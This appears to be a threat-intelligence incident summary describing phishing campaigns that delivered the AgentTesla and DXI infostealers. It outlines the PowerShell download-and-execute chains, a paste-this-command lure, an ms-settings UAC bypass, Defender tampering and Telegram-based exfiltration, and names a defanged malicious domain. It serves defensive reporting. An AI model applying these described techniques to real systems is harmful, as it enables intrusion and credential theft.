Phishing emails and malicious websites were used to trick users into launching PowerShell-driven malware chains that installed infostealers and stole credentials, clipboard data, and host information. In one case, an EDR alert on a finance user’s device showed msedge.exe spawning powershell.exe, followed by curl.exe, a downloaded DLL, and rundll32.exe; the decoded Base64 command used an IEX and Net.WebClient.DownloadString pattern to retrieve remote code after the user clicked an “Outstanding Invoice — Action Required” lure. The payload was identified as an AgentTesla variant, and responders isolated the host, revoked session tokens, reset credentials, and found two additional recipients of the same phishing email, though only one clicked and SmartScreen blocked the download.
A related intrusion used a phishing site that instructed victims to open PowerShell as administrator and paste an encoded command copied to the clipboard, leading to the download of a ZIP archive and execution of updater.exe, a packed PyInstaller-based DXI Infostealer sample. The malware used a UAC bypass via the ms-settings registry hijack and computerdefaults.exe, added Microsoft Defender exclusions, disabled protections, collected system, network, antivirus, clipboard, screenshot, and browser-related data, and packaged the results with rar.exe before exfiltrating them through the Telegram API as command-and-control. The activity showed a consistent pattern of social engineering, PowerShell abuse, defense evasion, staged payload delivery, and HTTPS or Telegram-based data theft.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
6 events from the most recent confirmed update back to the earliest known activity.
VirusTotal identified the payload as an AgentTesla variant associated with credential and clipboard theft. Responders isolated the host, revoked session tokens, reset credentials, and found two additional recipients of similar emails during a broader hunt, though only one clicked and SmartScreen blocked the download.
Email analysis linked the malicious execution to a phishing message with the subject “Outstanding Invoice — Action Required,” containing a PDF that led the user to click a malicious link. That link launched Microsoft Edge with a custom URL, initiating the observed activity.
An EDR alert identified a suspicious chain on a finance user's machine where msedge.exe spawned powershell.exe, which launched curl.exe, a downloaded DLL, and rundll32.exe. Investigation found a Base64-encoded PowerShell payload that decoded to an IEX/New-Object Net.WebClient DownloadString pattern consistent with remote script retrieval for commodity stealer or RAT activity.
The malware performed host and network discovery, antivirus discovery, clipboard access, Roblox credential theft, and screenshot capture, then archived collected data with rar.exe. It exfiltrated the stolen data through the Telegram API as its command-and-control channel.
Analysis showed the DXI Infostealer used the ms-settings registry hijack with computerdefaults.exe for UAC bypass, added Microsoft Defender exclusions, and disabled multiple Defender protections to evade detection. It also hid itself and later cleaned up created registry keys and self-deleted.
A phishing campaign used a malicious website that told victims to open PowerShell as administrator and paste an encoded command copied to the clipboard. The decoded script downloaded a ZIP from thaisbobetx[.]com, extracted and ran updater.exe, which was analyzed as the DXI Infostealer.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
2 references tracked. Mallory keeps watching after this page renders.
medium.com
Open sourcemedium.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.